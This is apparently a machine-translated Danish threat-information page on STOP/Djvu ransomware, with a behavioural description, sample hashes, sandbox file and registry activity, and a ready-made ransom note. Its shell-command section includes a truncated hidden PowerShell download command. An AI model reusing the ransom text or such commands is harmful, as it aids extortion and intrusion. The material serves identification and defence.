STOP Djvu Ransomware

STOP-ransomware-familien, også denomineret STOP Djvu Ransomware-familien, er et truende stykke malware. STOP Djvu er blot en af de mange trusler, der deler fælles karakteristika og stammer fra STOP-ransomware, selvom nogle af deres metoder til at påvirke filtyper og kryptere filudvidelser er forskellige.
Den originale STOP Ransomware blev set af sikkerhedsforskere så tidligt som i februar 2018. Siden da har den dog udviklet sig, og dens familie af kloner og offshoots er vokset. Den primære metode til distribution af STOP-ransomware var spam-e-mail-kampagner ved hjælp af beskadigede vedhæftede filer.
STOP Djvu-ransomware fungerer på en måde, der ligner andre ransomware-trusler af sin art, kryptering og blokering af adgang til nøglefiler, som brugerne muligvis bruger i deres system. Personlige filer, billeder, dokumenter og mere kan krypteres og i det væsentlige deaktiveres for alle brugere på maskinen. STOP Djvu ransomware blev først set i december 2018 i det, der syntes at være en ret vellykket infektionskampagne online. Forskere var uvidende om, hvordan ransomware spredte sig, men senere rapporterede ofre, at de opdagede infektioner, efter at de havde downloadet keygens eller revner. Når infiltrationen har fundet sted, ændrer STOP Djvu ransomware Windows-indstillingerne og tilføjer filer med en række navne, såsom .djvu, .djvus, .djvuu, .uudjvu, .udjvu eller .djvuq og de seneste .promorad og .promock-udvidelser. De nyere versioner har endnu ikke en decryptor, men de ældre kan dekrypteres ved hjælp af STOPDecrypter. Brugere rådes til at undgå at betale løsesum, uanset hvad.
Metoden, der bruges til at blokere adgang til filerne, bruger RSA-krypteringsalgoritmen. Selvom dekryptering af filerne kan virke hårdt for uerfarne brugere, er der absolut ingen grund til at gøre noget for at betale folkene bag truslen. Der gives normalt falske løfter i sådanne situationer, så brugere kan hurtigt finde ud af, at de ignoreres, når betalinger blev foretaget.
Angreb på STOP Djvu ransomware blev først rapporteret i slutningen af 2018. Den vigtigste distributionsmetode for STOP Djvu forblev spam-e-mails, og tweaks til kernen af ransomware var relativt små. Størstedelen af falske, kompromitterede vedhæftede filer, der blev brugt i spam-e-mails, var makroaktiverede kontordokumenter eller falske PDF-filer, der kørte ransomware uden offerets viden. STOP Djvus opførsel har heller ikke ændret sig meget - ransomware sletter stadig alle Shadow Volume-snapshots for at slippe af med sikkerhedskopier og begynder derefter at kryptere offerets filer.
Der er mindre ændringer i løsesumnoten, som gemmes som '_openme.txt' på offerets skrivebord. Teksten til løsepenge kan findes her:
'[start på løsepenge]
———————— ALLE DINE FILER ER Krypteret —————————
Bare rolig, du kan returnere alle dine filer!
Alle dine filer dokumenter, fotos, databaser og andet vigtigt er krypteret med den stærkeste kryptering og unikke nøgle.
Den eneste metode til gendannelse af filer er at købe dekrypteringsværktøj og unik nøgle til dig.
Denne software dekrypterer alle dine krypterede filer.
Hvilke garantier giver vi dig?
Du kan sende en af dine krypterede filer fra din pc, og vi dekrypterer den gratis.
Men vi kan kun dekryptere 1 fil gratis. Filen må ikke indeholde værdifulde oplysninger
Forsøg ikke at bruge tredjeparts dekrypteringsværktøjer, fordi det ødelægger dine filer.
Rabat 50% tilgængelig, hvis du kontakter os de første 72 timer.
———————————————————————————————————-
For at få denne software skal du skrive på vores e-mail:
helpshadow@india.com
Reserver e-mail-adresse for at kontakte os:
helpshadow@firemail.cc
Dit personlige id: [string]
[løsesum notat slut] '
Ransomware begrænsede sig til at omdøbe de krypterede filer med .djvu-udvidelsen oprindeligt, hvilket var et nysgerrig valg, fordi .djvu faktisk er et legitimt filformat udviklet af AT & T Labs og brugt til opbevaring af scannede dokumenter, noget svarende til Adobes .pdf. Senere versioner af ransomware vedtog en række andre udvidelser til krypterede filer, herunder '.chech,' '.luceq,' '.kroput1,' '.charck,' '.kropun ,,' .luces, '' .pulsar1, '' .uudjvu, '' .djvur, '' .tfude, '' .tfudeq 'og' .tfudet '.
Visse stammer af STOP Djvu ransomware kan dekrypteres gratis ved hjælp af den såkaldte 'STOPDecrypter', der blev udviklet af sikkerhedsforskeren Michael Gillespie og er tilgængelig online som en gratis download.
Indholdsfortegnelse
STOP Djvu Ransomware Video
Tip: Gør din lyd ON og se videoen i fuldskærmstilstand.

STOP Djvu Ransomware Skærmbilleder
Analyserapport
Generel information
| Efternavn: | STOP/DJVU Ransomware |
|---|---|
| Signaturstatus: | No Signature |
Kendte prøver
Kendte prøver
Dette afsnit viser andre fileksempler, der menes at være forbundet med denne familie.|
MD5:
def8a7bfe5fe47d95a95085d8dbc7a53
SHA1:
7182d4b2f55a560d83edf0824e119f71fa8422b6
SHA256:
B83855EA63E7F28396099A5B6E877BE537E78E4A50DF720262461A1D13B02192
Filstørrelse:
6.29 MB , 6292105 bytes
|
|
MD5:
a6b8c0cb178c31dd347554c3e5a0d5f8
SHA1:
91864f269d696ee80869cfeb3c9a204f8031a3bb
SHA256:
4FFB8E9ADF508662B5E51CBEC75B2E07CE1CBBFAAB873F72EDC7BAC385421E2C
Filstørrelse:
3.47 MB , 3471869 bytes
|
|
MD5:
2336c9624d9a44c393d354206226f508
SHA1:
ea7edc388ad62990f52b9ed40df26d20f4e20190
SHA256:
CE48ED04C92143B7E91F9665DD9337B2EE0B9CC1B5AEE534D26C09E084F8ABB0
Filstørrelse:
1.36 MB , 1359918 bytes
|
|
MD5:
42f32aa699bc45a3638ddeb325ebebc1
SHA1:
508cea3ba2bf04cc6851295f92bf0e752071f6b8
SHA256:
16532B38591B713395C288B11610494BCC4C4537BE492D43C54D66FEB7B95FA4
Filstørrelse:
1.33 MB , 1328186 bytes
|
|
MD5:
2391d41548b6432191f73edefa273928
SHA1:
620b714f84955aa7fb9a2f2cd528daa1621e18af
SHA256:
4D1EFAA3477B0B8D84025F3F0109E97ABA7CEB37F174B9DC79B7966CBB430959
Filstørrelse:
3.36 MB , 3357556 bytes
|
Vis mere
|
MD5:
710c3a1beb616d4aa7d5ed9a7f8848e4
SHA1:
326da9ddc0ea840e83f31fbf1f3377a06c911fe5
SHA256:
051DAB5E5247E25D6EB059A574383FB1EC99A5A4AAF9AA3694240FE25FA260AB
Filstørrelse:
1.36 MB , 1364106 bytes
|
|
MD5:
601b120a6f39f72847b2f581a3d5f158
SHA1:
0cc5781c1cfe6c5d034bd098229773e80e083732
SHA256:
BEC2BFF460615A35D4EA35BF25E9F89337E35E73441A4AC07562CE8E89BED818
Filstørrelse:
4.86 MB , 4858569 bytes
|
|
MD5:
a7b76a49f289081961f8f3824f0b62ca
SHA1:
6908790199785be7fc6c4eeb1fe426ee1b66cc0b
SHA256:
1A721E054386833AEBBF94C75871143376897E92C4A48278DDE95E6987634F45
Filstørrelse:
1.41 MB , 1406899 bytes
|
|
MD5:
9f37930d62a1e08f68aa0a72472e7a55
SHA1:
27706b3ff639e5dfa264a823dbe9229cf34ae153
SHA256:
29039902EEA4EE24C4C6368AA9B1D7F86BEC65ADA3ABDB0B92C1FEF311ACD31F
Filstørrelse:
600.12 KB , 600124 bytes
|
|
MD5:
7a18839fe61e9cde0e8fea3100acfb2b
SHA1:
9476c97a73e027016e9f6f2f20c2fb19264cd837
SHA256:
0271095F0AD5C6F26C9738ED5636E751B8868C1AE3B08D5D8C5218121D9FEEAF
Filstørrelse:
316.83 KB , 316832 bytes
|
|
MD5:
fe17d0f940a226e80cc18b4399da4ffc
SHA1:
cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b
SHA256:
D869A00DFA1BE0DF6D08BB72B790894D1861834D5E350F5DD54A70C3711BA713
Filstørrelse:
1.36 MB , 1363661 bytes
|
|
MD5:
ed83bea5600457af815495b10f235b87
SHA1:
14ac62ce3ae6b19186544e46ad7710d1814e3a9c
SHA256:
FC0AE843E31F77574448FF343F0E92A9F1953B43DC2495FFE2CA5F7F8E777401
Filstørrelse:
9.59 MB , 9590154 bytes
|
|
MD5:
8cc4ef6bfd98074474e53cefc0029d0a
SHA1:
7604b8cd9736a016748a1d2d1fe3eb9ec9db1bc9
SHA256:
72BE2A65C8E36058A40FB1EF582E944721F5D041044F454509242E00E6745198
Filstørrelse:
1.41 MB , 1407173 bytes
|
|
MD5:
75e7ec1010908f6cf964ee32c9d57fed
SHA1:
7cccec52318eadb6771ceef6404e19fc46ec8d07
SHA256:
A309D56010D51F07741773ABCC44C767EF99C1031DEFA575F07D11DD11F09E35
Filstørrelse:
2.44 MB , 2442353 bytes
|
Windows Portable Eksekverbare Attributter
- File doesn't have "Rich" header
- File doesn't have debug information
- File doesn't have exports table
- File doesn't have relocations information
- File doesn't have security information
- File has exports table
- File has TLS information
- File is 32-bit executable
- File is 64-bit executable
- File is either console or GUI application
Vis mere
- File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
- File is Native application (NOT .NET application)
- File is not packed
- IMAGE_FILE_DLL is not set inside PE header (Executable)
- IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)
Filikoner
Filikoner
Dette afsnit viser ikonressourcer, der findes i familieeksempler. Malware replikerer ofte ikoner, der almindeligvis er forbundet med legitim software, for at vildlede brugerne til at tro, at malwaren er sikker.Oplysninger om Windows PE-version
Oplysninger om Windows PE-version
Dette afsnit viser værdier og attributter, der er angivet i Windows-datastrukturen for filversionsoplysninger for eksempler inden for denne familie. For at vildlede brugerne tilføjer malwareaktører ofte falske versionsoplysninger, der efterligner legitim software.| Navn | Værdi |
|---|---|
| Assembly Version | 1.4.1.0 |
| Comments | This installation was built with Inno Setup. |
| Company Name |
|
| File Description |
|
| File Version |
Vis mere
|
| Internal Name |
|
| Legal Copyright |
|
| Original Filename |
|
| Product Name |
Vis mere
|
| Product Version |
Vis mere
|
Digitale signaturer
Digitale signaturer
Dette afsnit viser digitale signaturer, der er knyttet til eksempler inden for denne familie. Når man analyserer og verificerer digitale signaturer, er det vigtigt at bekræfte, at signaturens rodmyndighed er en velkendt og troværdig enhed, og at signaturens status er god. Malware signeres ofte med ikke-troværdige "Selvsignerede" digitale signaturer (som nemt kan oprettes af en malware-udvikler uden verifikation). Malware kan også signeres med legitime signaturer, der har en ugyldig status, og med signaturer fra tvivlsomme rodmyndigheder med falske eller vildledende "Underskriver"-navne.| Underskriver | Rod | Status |
|---|---|---|
| win.rar GmbH | DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1 | Self Signed |
| win.rar GmbH | GlobalSign CodeSigning CA - SHA256 - G3 | Hash Mismatch |
Filegenskaber
- .NET
- 2+ executable sections
- big overlay
- fptable
- HighEntropy
- Inno
- InnoSetup Installer
- Installer Manifest
- Installer Version
- MZ (In Overlay)
Vis mere
- No Version Info
- Nullsoft Installer
- RAR (In Overlay)
- RARinO
- Run
- SusSec
- vb6
- WinRAR SFX
- WRARSFX
- x64
- x86
Ændrede filer
Ændrede filer
Dette afsnit viser filer, der er oprettet, ændret, flyttet og/eller slettet af eksempler i denne familie. Filsystemaktivitet kan give værdifuld indsigt i, hvordan malware fungerer på operativsystemet.| Fil | Attributter |
|---|---|
| \device\namedpipe | Generic Read,Write Attributes |
| \device\namedpipe | Generic Write,Read Attributes |
| \device\namedpipe\gmdasllogger | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-13e8d.tmp\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-2buvv.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\is-88uan.tmp\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-8gkji.tmp\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-af9e7.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\is-bfiig.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\is-dlucn.tmp\7604b8cd9736a016748a1d2d1fe3eb9ec9db1bc9_0001407173.tmp | Generic Write,Read Attributes |
Vis mere
| c:\users\user\appdata\local\temp\is-du263.tmp\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-i0kj9.tmp\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-jos42.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\is-l4opd.tmp\cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b_0001363661.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-pk5hm.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\is-r9udb.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\is-shkd6.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\nshfa46.tmp\chip.bmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\header.bmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\nsdialogs.dll | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\screenshot.bmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\system.dll | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\winrar-x64-721b1ru.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\yandex.bmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\yandexbrowsersetup.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nsrfa35.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete |
| c:\users\user\appdata\local\temp\nsva331.tmp\banner.dll | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nsva331.tmp\nsexec.dll | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nsva331.tmp\system.dll | Generic Write,Read Attributes |
Ændringer i registreringsdatabasen
Ændringer i registreringsdatabasen
Dette afsnit viser registreringsdatabasenøgler og -værdier, der blev oprettet, ændret og/eller slettet af eksempler i denne familie. Aktivitet i Windows-registreringsdatabasen kan give værdifuld indsigt i malwarefunktionalitet. Derudover opretter malware ofte registreringsdatabaseværdier for at tillade sig selv at starte automatisk og fortsætte på ubestemt tid, efter at en første infektion har kompromitteret systemet.| Nøgle::Værdi | Data | API-navn |
|---|---|---|
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | wk � 8�jg�B �� �6 �v�� 7� �� �� ۀ�� � T�B� ����� ���%�� 3bBx �<�� �!#��$kF$�� %`� %�&� &�-'�!(�(X�(�) ;)E)�`*J*9*�",=� -!R0P%1`1�1HO 5,]5�G>�� @V� @�*A��BB�� E�mF | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 졷鑂셱ǜ | RegNtPreCreateKey |
Brug af Windows API
Brug af Windows API
Dette afsnit viser de Windows API-kald, der bruges af eksemplerne i denne familie. Analyse af Windows API-brug er et værdifuldt værktøj, der kan hjælpe med at identificere ondsindet aktivitet, såsom keylogging, eskalering af sikkerhedsrettigheder, datakryptering, dataudrensning, interferens med antivirussoftware og manipulation af netværksanmodninger.| Kategori | API'en |
|---|---|
| Other Suspicious |
|
| Anti Debug |
|
| User Data Access |
|
| Process Manipulation Evasion |
|
| Process Shell Execute |
|
| Keyboard Access |
|
| Syscall Use |
Vis mere
|
| Encryption Used |
|
Udførelse af Shell-kommando
Udførelse af Shell-kommando
Dette afsnit viser en liste over Windows Shell-kommandoer, der køres af eksemplerne i denne familie. Windows Shell-kommandoer udnyttes ofte af malware til skumle formål og kan bruges til at hæve sikkerhedsrettigheder, downloade og starte anden malware, udnytte sårbarheder, indsamle og tømme data og skjule ondsindet aktivitet.
"C:\Users\Lehsoaco\AppData\Local\Temp\is-88UAN.tmp\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918.tmp" /SL5="$5036E,928289,131584,c:\users\user\downloads\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918"
|
"C:\Users\Dfhrhqtz\AppData\Local\Temp\is-13E8D.tmp\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186.tmp" /SL5="$802E8,896816,131584,c:\users\user\downloads\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186"
|
"C:\Users\Eberzneu\AppData\Local\Temp\is-DU263.tmp\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106.tmp" /SL5="$30364,932379,131584,c:\users\user\downloads\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106"
|
"C:\Users\Qxnqehmu\AppData\Local\Temp\is-8GKJI.tmp\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569.tmp" /SL5="$402E8,3435751,309760,c:\users\user\downloads\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569"
|
"C:\Users\Qlwpcgcn\AppData\Local\Temp\is-I0KJ9.tmp\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899.tmp" /SL5="$30336,975597,131584,c:\users\user\downloads\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899"
|
Vis mere
powershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "try { $WebClient = New-Object System.Net.WebClient
|
"C:\Users\Czxnhiuo\AppData\Local\Temp\is-L4OPD.tmp\cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b_0001363661.tmp" /SL5="$40356,931898,131584,c:\users\user\downloads\cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b_0001363661"
|
"C:\Users\Rziyzfeg\AppData\Local\Temp\is-DLUCN.tmp\7604b8cd9736a016748a1d2d1fe3eb9ec9db1bc9_0001407173.tmp" /SL5="$1C02AC,975756,131584,c:\users\user\downloads\7604b8cd9736a016748a1d2d1fe3eb9ec9db1bc9_0001407173"
|


